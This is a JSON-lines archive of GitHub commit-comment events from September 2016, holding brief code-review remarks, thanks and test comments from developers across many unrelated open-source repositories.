{"id":"4610866220","type":"CommitCommentEvent","actor":{"login":"jacss"},"repo":{"name":"jacss/PayParking"},"payload":{"comment":{"id":19152851,"position":null,"line":null,"path":null,"commit_id":"4c7c86398d98c0553477a78577137cd1d17b5b9c","created_at":"2016-09-23T20:55:33Z","updated_at":"2016-09-23T20:55:33Z","body":"Construção da tela de Preços e Usuarios"}},"created_at":"2016-09-23T20:55:33Z"}
{"id":"4610875155","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19152874,"position":null,"line":null,"path":null,"commit_id":"0a2b9c237d803394f5f9202e679b4a9a53f1f099","created_at":"2016-09-23T20:57:20Z","updated_at":"2016-09-23T20:57:20Z","body":"What is the point of this canStartMoving? isn't the canMoveEvent enough?"}},"created_at":"2016-09-23T20:57:20Z"}
{"id":"4610877195","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19152878,"position":25,"line":141,"path":"ebpf-programs/http-responses.c","commit_id":"9e7f069d0e920da72d44a7e0711b464684588e77","created_at":"2016-09-23T20:57:46Z","updated_at":"2016-09-23T20:57:46Z","body":"What about\r\n```\r\nnew_codes_counts = *current_codes_counts;\r\n```"}},"created_at":"2016-09-23T20:57:46Z"}
{"id":"4610885457","type":"CommitCommentEvent","actor":{"login":"nabbhacker"},"repo":{"name":"HikigayaAss/LeagueSharp"},"payload":{"comment":{"id":19152906,"position":6,"line":124,"path":"Hikigaya Syndra/Hikigaya Syndra/Helper.cs","commit_id":"50019b064e85ab92dab557769f4366e2be20e50b","created_at":"2016-09-23T20:59:30Z","updated_at":"2016-09-23T20:59:30Z","body":"nice hehexd\r\n\r\nIt's (SpellSlot.R).Ammo"}},"created_at":"2016-09-23T20:59:30Z"}
{"id":"4610890261","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19152919,"position":null,"line":null,"path":null,"commit_id":"8887b4c5516533c452361b784ba755664cd84815","created_at":"2016-09-23T21:00:27Z","updated_at":"2016-09-23T21:00:27Z","body":"why do you add all this in the constructor?\r\n\r\n```\r\n+    MSWeekViewDecoratorNewEvent * weekViewDecorator = [self.class new];\r\n +    weekViewDecorator.weekView              = weekView;\r\n +    weekViewDecorator.shortPress = shortPress;\r\n +    weekView.collectionView.dataSource      = weekViewDecorator;\r\n +    weekView.collectionView.delegate        = weekViewDecorator;\r\n +    [weekViewDecorator setup];\r\n```\r\n\r\nins't the [super setup] working?"}},"created_at":"2016-09-23T21:00:27Z"}
{"id":"4610899073","type":"CommitCommentEvent","actor":{"login":"rubino84"},"repo":{"name":"rubino84/Reflections"},"payload":{"comment":{"id":19152947,"position":null,"line":null,"path":null,"commit_id":"ce140a4e6c7d8d917bdcc27c76037e365d8db083","created_at":"2016-09-23T21:02:15Z","updated_at":"2016-09-23T21:02:15Z","body":"1 - When would you want to use a remote repository rather than keeping all your work local?\r\n    When you want to share your projects, files with other people to either read them only or contribute with your projects. "}},"created_at":"2016-09-23T21:02:15Z"}
{"id":"4610902553","type":"CommitCommentEvent","actor":{"login":"ThariqS"},"repo":{"name":"pubpub/pubpub"},"payload":{"comment":{"id":19152956,"position":null,"line":null,"path":null,"commit_id":"11ef6e7909e80e87903b152f1bcc75ca1c7c73d7","created_at":"2016-09-23T21:02:58Z","updated_at":"2016-09-23T21:02:58Z","body":"🔥 "}},"created_at":"2016-09-23T21:02:58Z"}
{"id":"4610907995","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19152964,"position":null,"line":null,"path":null,"commit_id":"cab4398aa74fae182ae83fd1dd0d90d327bba561","created_at":"2016-09-23T21:03:54Z","updated_at":"2016-09-23T21:03:54Z","body":"What do you mean with \"some delta of the desired time\" It works fine to me"}},"created_at":"2016-09-23T21:03:54Z"}
{"id":"4610910449","type":"CommitCommentEvent","actor":{"login":"blimmer"},"repo":{"name":"ember-cli-deploy/ember-cli-deploy-s3"},"payload":{"comment":{"id":19152973,"position":null,"line":null,"path":null,"commit_id":"b1bcb311de5b528a2cb29ccb6eafa975d6e23d87","created_at":"2016-09-23T21:04:28Z","updated_at":"2016-09-23T21:04:28Z","body":"@habdelra  just wanted to say \"thanks!\" for adding the functionality. I had to add a `.well-known` folder today and this made it extremely easy. 🍻 "}},"created_at":"2016-09-23T21:04:28Z"}
{"id":"4610913558","type":"CommitCommentEvent","actor":{"login":"habdelra"},"repo":{"name":"ember-cli-deploy/ember-cli-deploy-s3"},"payload":{"comment":{"id":19152982,"position":null,"line":null,"path":null,"commit_id":"b1bcb311de5b528a2cb29ccb6eafa975d6e23d87","created_at":"2016-09-23T21:05:06Z","updated_at":"2016-09-23T21:05:06Z","body":"sure thing!"}},"created_at":"2016-09-23T21:05:06Z"}
{"id":"4610915548","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"Datatekniikka/TaistoCMS"},"payload":{"comment":{"id":19152989,"position":1,"line":9,"path":"database.sql","commit_id":"4518983add7d95d75176bc855517740c6838ce6a","created_at":"2016-09-23T21:05:31Z","updated_at":"2016-09-23T21:05:31Z","body":"Engine=default"}},"created_at":"2016-09-23T21:05:31Z"}
{"id":"4610916895","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19152993,"position":null,"line":null,"path":null,"commit_id":"35a2aa06700b542f80de56cace4ff898ba660142","created_at":"2016-09-23T21:05:49Z","updated_at":"2016-09-23T21:05:49Z","body":"Will you PR all these? They look really good :D"}},"created_at":"2016-09-23T21:05:49Z"}
{"id":"4610920864","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19153001,"position":null,"line":null,"path":null,"commit_id":"ed25a6b0d983a98155087e53dab7e871e25252d6","created_at":"2016-09-23T21:06:40Z","updated_at":"2016-09-23T21:06:40Z","body":"Ignore my previous comment hahaha, I was dumb figured it out :)"}},"created_at":"2016-09-23T21:06:40Z"}
{"id":"4610931538","type":"CommitCommentEvent","actor":{"login":"VictorNogueiraRio"},"repo":{"name":"felipegus8/Trab_Modular"},"payload":{"comment":{"id":19153029,"position":null,"line":null,"path":null,"commit_id":"86d0a0cd5f1e49e214392c518fed979588ae8fca","created_at":"2016-09-23T21:09:05Z","updated_at":"2016-09-23T21:09:05Z","body":"commit final"}},"created_at":"2016-09-23T21:09:05Z"}
{"id":"4610934882","type":"CommitCommentEvent","actor":{"login":"rubino84"},"repo":{"name":"rubino84/Reflections"},"payload":{"comment":{"id":19153040,"position":1,"line":1,"path":"lesson_3_reflections.txt","commit_id":"ce140a4e6c7d8d917bdcc27c76037e365d8db083","created_at":"2016-09-23T21:09:51Z","updated_at":"2016-09-23T21:09:51Z","body":"First reflection on Remote"}},"created_at":"2016-09-23T21:09:51Z"}
{"id":"4610935459","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19153045,"position":null,"line":null,"path":null,"commit_id":"ed25a6b0d983a98155087e53dab7e871e25252d6","created_at":"2016-09-23T21:09:59Z","updated_at":"2016-09-23T21:09:59Z","body":"I waste for some time. Leave until well. Later we solve this problem.\r\nОтходил на некоторое время. Оставь пока так. Позже решим данную проблему."}},"created_at":"2016-09-23T21:09:59Z"}
{"id":"4610937392","type":"CommitCommentEvent","actor":{"login":"csatigabi"},"repo":{"name":"csatigabi/courseproject"},"payload":{"comment":{"id":19153058,"position":5,"line":5,"path":"README.md","commit_id":"277807d0713020feec34abe53baf88ced6b82d32","created_at":"2016-09-23T21:10:23Z","updated_at":"2016-09-23T21:10:23Z","body":"**Accessing Data**"}},"created_at":"2016-09-23T21:10:23Z"}
{"id":"4610939847","type":"CommitCommentEvent","actor":{"login":"Nedlinin"},"repo":{"name":"Nedlinin/connect-mssql"},"payload":{"comment":{"id":19153066,"position":null,"line":null,"path":null,"commit_id":"c1822c73beff71a49be4881c7a519f86f07b0583","created_at":"2016-09-23T21:10:57Z","updated_at":"2016-09-23T21:10:57Z","body":"Turns out config.options is the options for mssql whereas the second param are the options for connect-mssql.  So, this commit is incorrect!"}},"created_at":"2016-09-23T21:10:57Z"}
{"id":"4610942364","type":"CommitCommentEvent","actor":{"login":"adrianlzt"},"repo":{"name":"volatilityfoundation/volatility"},"payload":{"comment":{"id":19153078,"position":4,"line":47,"path":"volatility/plugins/linux/linux_yarascan.py","commit_id":"a69bc6f84bfa59ccf93fcdd67ffecc6831843e53","created_at":"2016-09-23T21:11:31Z","updated_at":"2016-09-23T21:11:31Z","body":"This description don't seems to be for this plugin"}},"created_at":"2016-09-23T21:11:31Z"}
{"id":"4610943911","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19153089,"position":null,"line":null,"path":null,"commit_id":"ed25a6b0d983a98155087e53dab7e871e25252d6","created_at":"2016-09-23T21:11:52Z","updated_at":"2016-09-23T21:11:52Z","body":"Don't worry I solved it, I'm gonna continue scripting General Nazgrim basically it's almost done script."}},"created_at":"2016-09-23T21:11:52Z"}
{"id":"4610947562","type":"CommitCommentEvent","actor":{"login":"Cebola94"},"repo":{"name":"Cebola94/Implementation-of-TCC"},"payload":{"comment":{"id":19153100,"position":null,"line":null,"path":null,"commit_id":"c1072b170703f2ce3b44a124472981cfd163b195","created_at":"2016-09-23T21:12:42Z","updated_at":"2016-09-23T21:12:42Z","body":"Agora vai!!!"}},"created_at":"2016-09-23T21:12:42Z"}
{"id":"4610949769","type":"CommitCommentEvent","actor":{"login":"Cebola94"},"repo":{"name":"Cebola94/Implementation-of-TCC"},"payload":{"comment":{"id":19153107,"position":3,"line":3,"path":"README.md","commit_id":"c1072b170703f2ce3b44a124472981cfd163b195","created_at":"2016-09-23T21:13:11Z","updated_at":"2016-09-23T21:13:11Z","body":"Testando"}},"created_at":"2016-09-23T21:13:11Z"}
{"id":"4610952975","type":"CommitCommentEvent","actor":{"login":"sarasafavi"},"repo":{"name":"octocat/Spoon-Knife"},"payload":{"comment":{"id":19153114,"position":3,"line":1,"path":"fake_file.md","commit_id":"60a2fec6c28c7d30082c588952d7eb148d5e1f73","created_at":"2016-09-23T21:13:53Z","updated_at":"2016-09-23T21:13:53Z","body":"test comment pls ignore"}},"created_at":"2016-09-23T21:13:53Z"}
{"id":"4610962291","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19153150,"position":null,"line":null,"path":null,"commit_id":"397538a7e11d784e49e224250e0f353dcf51ba08","created_at":"2016-09-23T21:16:05Z","updated_at":"2016-09-23T21:16:05Z","body":"Perhaps there is configure option `--disable-mmap` ... I hadn't checked."}},"created_at":"2016-09-23T21:16:05Z"}
{"id":"4610963394","type":"CommitCommentEvent","actor":{"login":"AlfieC"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19153154,"position":null,"line":null,"path":null,"commit_id":"d3eb13d60dad0ea895ea8eef73216dae955a3fba","created_at":"2016-09-23T21:16:20Z","updated_at":"2016-09-23T21:16:20Z","body":"Max Y level is 256 - could be exploited to \"teleport\" into peoples bases on certain gamemodes. I could make a TNT cannon and propel myself upwards and then log out at y > 300. Could be improved by searching for the highest safe location (2x air and 1x block below)."}},"created_at":"2016-09-23T21:16:20Z"}
{"id":"4610966227","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19153161,"position":null,"line":null,"path":null,"commit_id":"ed25a6b0d983a98155087e53dab7e871e25252d6","created_at":"2016-09-23T21:16:59Z","updated_at":"2016-09-23T21:16:59Z","body":"Well then, good job, cybrann."}},"created_at":"2016-09-23T21:16:59Z"}
{"id":"4610968623","type":"CommitCommentEvent","actor":{"login":"sarasafavi"},"repo":{"name":"octocat/Spoon-Knife"},"payload":{"comment":{"id":19153170,"position":null,"line":null,"path":null,"commit_id":"cbc28e7c8caee26febc8c013b0adfb97a4edd96e","created_at":"2016-09-23T21:17:31Z","updated_at":"2016-09-23T21:17:31Z","body":"commit comment"}},"created_at":"2016-09-23T21:17:31Z"}
{"id":"4610970538","type":"CommitCommentEvent","actor":{"login":"sarasafavi"},"repo":{"name":"octocat/Spoon-Knife"},"payload":{"comment":{"id":19153172,"position":3,"line":1,"path":"fake_file.md","commit_id":"60a2fec6c28c7d30082c588952d7eb148d5e1f73","created_at":"2016-09-23T21:17:57Z","updated_at":"2016-09-23T21:17:57Z","body":"specific line comment too"}},"created_at":"2016-09-23T21:17:57Z"}
{"id":"4610971067","type":"CommitCommentEvent","actor":{"login":"benjwadams"},"repo":{"name":"benjwadams/compliance-checker"},"payload":{"comment":{"id":19153174,"position":33,"line":579,"path":"compliance_checker/suite.py","commit_id":"79119cc53226d4ff4c54a54329e56212876852c0","created_at":"2016-09-23T21:18:05Z","updated_at":"2016-09-23T21:18:05Z","body":"I found that seek can break if you're passing in process substitution in Bash, i.e.\r\n\r\n`python ../cchecker.py -t ioos <(curl 'http://data.oceansmap.com/thredds/sos/caricoos_ag/VIA/VIA.ncml')`\r\n...\r\n`IOError: [Errno 29] Illegal seek`"}},"created_at":"2016-09-23T21:18:05Z"}
{"id":"4610982119","type":"CommitCommentEvent","actor":{"login":"krono"},"repo":{"name":"dalehenrich/filetree"},"payload":{"comment":{"id":19153200,"position":null,"line":null,"path":null,"commit_id":"262b0288b113bca0b3aff1bee005d87916c0c1ff","created_at":"2016-09-23T21:20:32Z","updated_at":"2016-09-23T21:20:32Z","body":"@dalehenrich Is this sufficient for you or is a slipstream necessary?"}},"created_at":"2016-09-23T21:20:32Z"}
{"id":"4610984727","type":"CommitCommentEvent","actor":{"login":"sarasafavi"},"repo":{"name":"octocat/Spoon-Knife"},"payload":{"comment":{"id":19153211,"position":4,"line":2,"path":"fake_file.md","commit_id":"60a2fec6c28c7d30082c588952d7eb148d5e1f73","created_at":"2016-09-23T21:21:08Z","updated_at":"2016-09-23T21:21:08Z","body":"commenting on a specific line (L2) on specific commit (60a2fec)"}},"created_at":"2016-09-23T21:21:08Z"}
{"id":"4610985469","type":"CommitCommentEvent","actor":{"login":"mallardduck"},"repo":{"name":"phpWhois/phpWhois"},"payload":{"comment":{"id":19153214,"position":null,"line":null,"path":null,"commit_id":"ef87bf254a746544430f001d4b25e1e76e8c5ab8","created_at":"2016-09-23T21:21:17Z","updated_at":"2016-09-23T21:21:17Z","body":"It seems this change is causing errors for me due to a few missing updates to the Whois.php file."}},"created_at":"2016-09-23T21:21:17Z"}
{"id":"4610992528","type":"CommitCommentEvent","actor":{"login":"kylefleming"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19153231,"position":null,"line":null,"path":null,"commit_id":"35a2aa06700b542f80de56cace4ff898ba660142","created_at":"2016-09-23T21:22:51Z","updated_at":"2016-09-23T21:22:51Z","body":"Yep definitely! I'm about to go out of town for the weekend, so I'll send them your way next week."}},"created_at":"2016-09-23T21:22:51Z"}
{"id":"4610997596","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19153244,"position":null,"line":null,"path":null,"commit_id":"ed25a6b0d983a98155087e53dab7e871e25252d6","created_at":"2016-09-23T21:24:01Z","updated_at":"2016-09-23T21:24:01Z","body":"Ah you are making me blush :D :D"}},"created_at":"2016-09-23T21:24:01Z"}
{"id":"4610999808","type":"CommitCommentEvent","actor":{"login":"ovbrianna"},"repo":{"name":"ovbrianna/markitwith"},"payload":{"comment":{"id":19153250,"position":1,"line":1,"path":"README.md","commit_id":"65676c7f0ccbfe433e9bc7719a82ab1dddbece90","created_at":"2016-09-23T21:24:33Z","updated_at":"2016-09-23T21:24:33Z","body":"How does this work?"}},"created_at":"2016-09-23T21:24:33Z"}
{"id":"4611000863","type":"CommitCommentEvent","actor":{"login":"aveshagarwal"},"repo":{"name":"aveshagarwal/etcd-container"},"payload":{"comment":{"id":19153252,"position":null,"line":null,"path":null,"commit_id":"0e08f11c30690e0ecbc7125f62af3d00cb65a38d","created_at":"2016-09-23T21:24:48Z","updated_at":"2016-09-23T21:24:48Z","body":"@qiancai I added all etcd environment variables to manifest.json and config.json so that they can be configured via atomic install."}},"created_at":"2016-09-23T21:24:48Z"}
{"id":"4611001397","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19153256,"position":null,"line":null,"path":null,"commit_id":"e571fd0e8ee7d755a88fa15c3269202baebbe209","created_at":"2016-09-23T21:24:56Z","updated_at":"2016-09-23T21:24:56Z","body":"Rook outpost usually come up with some pawns on the side of the rook. \r\nSimplifying (or improving) RookOnPawn is impossible,\r\nI think I ran 30 tests on that one alone (mine or those that I helped with).\r\nThis is one of those multi-purpose bonus that just seems to work \"as is\".\r\n\r\nSeriously, best chance is to try just the outpost just for queen."}},"created_at":"2016-09-23T21:24:56Z"}
{"id":"4611004418","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19153262,"position":4,"line":4,"path":"spec/ruby/library/bigmath/log_spec.rb","commit_id":"84a5f780a07576509e73467321fe775fb9c0ee77","created_at":"2016-09-23T21:25:37Z","updated_at":"2016-09-23T21:25:37Z","body":"Oops...copypasta. I'll fix it."}},"created_at":"2016-09-23T21:25:37Z"}
{"id":"4611005533","type":"CommitCommentEvent","actor":{"login":"MrTaquito"},"repo":{"name":"MrTaquito/hello-world"},"payload":{"comment":{"id":19153269,"position":2,"line":2,"path":"README.md","commit_id":"98afb4cda96b93f63eae9b4aba46e9f38841ad02","created_at":"2016-09-23T21:25:52Z","updated_at":"2016-09-23T21:25:52Z","body":"Epicodus program"}},"created_at":"2016-09-23T21:25:52Z"}
{"id":"4611009217","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/db-meinfernbus-cities"},"payload":{"comment":{"id":19153284,"position":null,"line":null,"path":null,"commit_id":"353ddf6a9aa7eca831425bae5469193e60e58383","created_at":"2016-09-23T21:26:45Z","updated_at":"2016-09-23T21:26:45Z","body":"I obviously meant `zip-to-city`."}},"created_at":"2016-09-23T21:26:45Z"}
{"id":"4611009369","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19153285,"position":135,"line":404,"path":"spring-web-reactive/src/test/java/org/springframework/web/reactive/result/method/annotation/RequestMappingMessageConversionIntegrationTests.java","commit_id":"48d67a245b0d7742a6a2bf0b5e801c5e00bc91bf","created_at":"2016-09-23T21:26:46Z","updated_at":"2016-09-23T21:26:46Z","body":"No it's not for sync methods only. We've support to make sure it works as I said it does. See https://github.com/spring-projects/spring-framework/blob/master/spring-web-reactive/src/test/java/org/springframework/web/reactive/result/method/annotation/RequestMappingExceptionHandlingIntegrationTests.java. It's based on a Reactive Streams publisher but it's the same idea."}},"created_at":"2016-09-23T21:26:46Z"}
{"id":"4611009416","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19153286,"position":4,"line":4,"path":"spec/ruby/library/bigmath/log_spec.rb","commit_id":"84a5f780a07576509e73467321fe775fb9c0ee77","created_at":"2016-09-23T21:26:48Z","updated_at":"2016-09-23T21:26:48Z","body":"b766ce8"}},"created_at":"2016-09-23T21:26:48Z"}
{"id":"4611011110","type":"CommitCommentEvent","actor":{"login":"aveshagarwal"},"repo":{"name":"aveshagarwal/etcd-container"},"payload":{"comment":{"id":19153290,"position":null,"line":null,"path":null,"commit_id":"e61eb737c769d38a55955aa9c9413b3009100d3f","created_at":"2016-09-23T21:27:19Z","updated_at":"2016-09-23T21:27:19Z","body":"@qiancai I added all etcd environment variables to manifest.json and config.json so that they can be configured via atomic install."}},"created_at":"2016-09-23T21:27:19Z"}
{"id":"4611012482","type":"CommitCommentEvent","actor":{"login":"TheCrimulo"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19153293,"position":12,"line":26,"path":"lib/thread.l","commit_id":"76f52faa7109822ad59cc7edf68b21c13260dea1","created_at":"2016-09-23T21:27:45Z","updated_at":"2016-09-23T21:27:45Z","body":"```lua\r\nfunction thread.new(file, uid)\r\n-- [other code]\r\nself.env = {}; _copy(_G, self.env)\r\nblacklist = {'rawget', 'rawset', 'dofile', '_G'}\r\nfor k,v in pairs(blacklist) do self.env[k] = nil end\r\nself.task = loadfile(file, nil, self.env)\r\nself.thread = coroutine.create(task)\r\n```"}},"created_at":"2016-09-23T21:27:45Z"}
{"id":"4611023138","type":"CommitCommentEvent","actor":{"login":"lesikv1"},"repo":{"name":"lesikv1/lesik"},"payload":{"comment":{"id":19153315,"position":4,"line":7,"path":"index.html","commit_id":"86185dba001a0e6d1c7a4806708b3c2e3b87f85d","created_at":"2016-09-23T21:30:03Z","updated_at":"2016-09-23T21:30:03Z","body":"."}},"created_at":"2016-09-23T21:30:03Z"}
{"id":"4611035562","type":"CommitCommentEvent","actor":{"login":"aveshagarwal"},"repo":{"name":"aveshagarwal/etcd-container"},"payload":{"comment":{"id":19153346,"position":null,"line":null,"path":null,"commit_id":"e61eb737c769d38a55955aa9c9413b3009100d3f","created_at":"2016-09-23T21:32:55Z","updated_at":"2016-09-23T21:32:55Z","body":"@giuseppe Added more etcd env variables here."}},"created_at":"2016-09-23T21:32:55Z"}
{"id":"4611036638","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19153347,"position":null,"line":null,"path":null,"commit_id":"ed25a6b0d983a98155087e53dab7e871e25252d6","created_at":"2016-09-23T21:33:10Z","updated_at":"2016-09-23T21:33:10Z","body":":D"}},"created_at":"2016-09-23T21:33:10Z"}
{"id":"4611041171","type":"CommitCommentEvent","actor":{"login":"guirenard"},"repo":{"name":"nuxeo/nuxeo-web-ui"},"payload":{"comment":{"id":19153363,"position":17,"line":320,"path":"app/elements/nuxeo-app/nuxeo-app.html","commit_id":"654ff81c7cce1a4322b42ba1c7434c7788039b57","created_at":"2016-09-23T21:34:15Z","updated_at":"2016-09-23T21:34:15Z","body":"tx, done"}},"created_at":"2016-09-23T21:34:15Z"}
{"id":"4611041826","type":"CommitCommentEvent","actor":{"login":"MustafaMustafa"},"repo":{"name":"rnc-lbl/star-picoDst"},"payload":{"comment":{"id":19153367,"position":19,"line":66,"path":"StPicoDstMaker/StPicoDstMaker.cxx","commit_id":"21871d25082648d3de1350325fb65b9aa7c920ae","created_at":"2016-09-23T21:34:23Z","updated_at":"2016-09-23T21:34:23Z","body":"That is a clean option. We can also change that value only in a separate a\nnew commit.\n\nOn Sep 23, 2016 1:38 PM, \"Dmitri Smirnov\" <notifications@github.com> wrote:\n\n> I overlooked this change from Victor. Let's undo the merge of the cvs\n> branch onto master?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rnc-lbl/star-picoDst/commit/21871d25082648d3de1350325fb65b9aa7c920ae#commitcomment-19152596>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA_qi4iNHBtvAb5BIDLAcBWGe-4_r--Sks5qtDjHgaJpZM4KFWLL>\n> .\n>\n"}},"created_at":"2016-09-23T21:34:23Z"}
{"id":"4611044501","type":"CommitCommentEvent","actor":{"login":"mikedougherty"},"repo":{"name":"docker/jenkins-pipeline-scripts"},"payload":{"comment":{"id":19153377,"position":null,"line":null,"path":null,"commit_id":"98ef065796cdc8ae5b74f1855041fc187c8b1ff8","created_at":"2016-09-23T21:35:01Z","updated_at":"2016-09-23T21:35:01Z","body":"Hi @jglick! Actually, I didn't. Somehow I wasn't \"watching\" this repository, which I just fixed. Thanks for your improvements, I'll have a look now."}},"created_at":"2016-09-23T21:35:01Z"}
{"id":"4611045237","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19153381,"position":null,"line":null,"path":null,"commit_id":"f97bf21081e2c13bdea6e165741255118ad6effe","created_at":"2016-09-23T21:35:12Z","updated_at":"2016-09-23T21:35:12Z","body":"\nBuild report #162315713 for sha f97bf21081e2c13bdea6e165741255118ad6effe:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-13.86%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3521%20/%2010013%20%2835.16%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-30.82%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-23T21:35:12Z"}
{"id":"4611045456","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"logrotate/logrotate"},"payload":{"comment":{"id":19153383,"position":null,"line":null,"path":null,"commit_id":"b4c9091fc011ec9c449553ea8bfc5a2b04d887ce","created_at":"2016-09-23T21:35:15Z","updated_at":"2016-09-23T21:35:15Z","body":"#65"}},"created_at":"2016-09-23T21:35:15Z"}
{"id":"4611046597","type":"CommitCommentEvent","actor":{"login":"PMARSDEN727"},"repo":{"name":"PMARSDEN727/Hello_World"},"payload":{"comment":{"id":19153391,"position":5,"line":5,"path":"README.md","commit_id":"a7b5cde9c90fb22d73ab212daa62a980f2fc3fd4","created_at":"2016-09-23T21:35:31Z","updated_at":"2016-09-23T21:35:31Z","body":"I am pretty sure that the pound sign causes a title and seperation of code\r\n"}},"created_at":"2016-09-23T21:35:31Z"}
{"id":"4611049281","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"aconanlai/moneyy"},"payload":{"comment":{"id":19153401,"position":null,"line":null,"path":null,"commit_id":"ebdcb4c3bc8754a03366eaf731a5d0ff734e2fcf","created_at":"2016-09-23T21:36:09Z","updated_at":"2016-09-23T21:36:09Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [randomizing images on localhost landing page](https://trello.com/c/I0jeIzWw/10-randomizing-images-on-localhost-landing-page)"}},"created_at":"2016-09-23T21:36:09Z"}
{"id":"4611053309","type":"CommitCommentEvent","actor":{"login":"cliveb"},"repo":{"name":"gdg-x/hoverboard"},"payload":{"comment":{"id":19153411,"position":null,"line":null,"path":null,"commit_id":"7f9888887c0b4ddd7c1518d5c38eb90501c1dd22","created_at":"2016-09-23T21:37:07Z","updated_at":"2016-09-23T21:37:07Z","body":"GDG Seattle is proud to use Hoverboard. Big thanks to Oleh Zasadnyy from GDG Lviv for this template. A terrific implementation of latest web technologies to move beyond frameworks to next era web applications - I learned a lot. CliveB"}},"created_at":"2016-09-23T21:37:07Z"}
{"id":"4611055162","type":"CommitCommentEvent","actor":{"login":"wwsean08"},"repo":{"name":"wwsean08/f5go"},"payload":{"comment":{"id":19153417,"position":null,"line":null,"path":null,"commit_id":"9c0f31a924b4a18cfe5bf73ce4163debdda26d7c","created_at":"2016-09-23T21:37:35Z","updated_at":"2016-09-23T21:37:35Z","body":"Added a comment which will get merged in next time"}},"created_at":"2016-09-23T21:37:35Z"}
{"id":"4611055259","type":"CommitCommentEvent","actor":{"login":"rkirov"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19153418,"position":10,"line":84,"path":"modules/@angular/compiler/src/output/ts_emitter.ts","commit_id":"d4e9af3ccb0f6ec4d610518f9c0435bcb9f9042f","created_at":"2016-09-23T21:37:36Z","updated_at":"2016-09-23T21:37:36Z","body":"That would be better indeed."}},"created_at":"2016-09-23T21:37:36Z"}
{"id":"4611076415","type":"CommitCommentEvent","actor":{"login":"d-koppenhagen"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19153467,"position":10,"line":10,"path":"src/app/book-monkey/iteration-5/directives/shared/zoom-book-cover.directive.ts","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-23T21:42:42Z","updated_at":"2016-09-23T21:42:42Z","body":"@GregOnNet : siehe https://angular.io/docs/ts/latest/cheatsheet.html"}},"created_at":"2016-09-23T21:42:42Z"}
{"id":"4611078427","type":"CommitCommentEvent","actor":{"login":"arturogarciagarcia"},"repo":{"name":"amadontsc/Practica-2_Comidas"},"payload":{"comment":{"id":19153470,"position":null,"line":null,"path":null,"commit_id":"175682669920bbcd938a47a92066f3d638c2cad1","created_at":"2016-09-23T21:43:11Z","updated_at":"2016-09-23T21:43:11Z","body":"le agrege al mesero a tu repositorio"}},"created_at":"2016-09-23T21:43:11Z"}
{"id":"4611085003","type":"CommitCommentEvent","actor":{"login":"juliocesar-io"},"repo":{"name":"secbi-ucc/control-bienestar"},"payload":{"comment":{"id":19153487,"position":12,"line":11,"path":"programacion/models.py","commit_id":"5600a82fd90479434609312b4213c2e6a018ffa2","created_at":"2016-09-23T21:44:43Z","updated_at":"2016-09-23T21:44:43Z","body":"Cambiar por tipo de dato en ref\r\n\r\nref: https://docs.djangoproject.com/en/1.10/ref/models/fields/#django.db.models.DateTimeField"}},"created_at":"2016-09-23T21:44:43Z"}
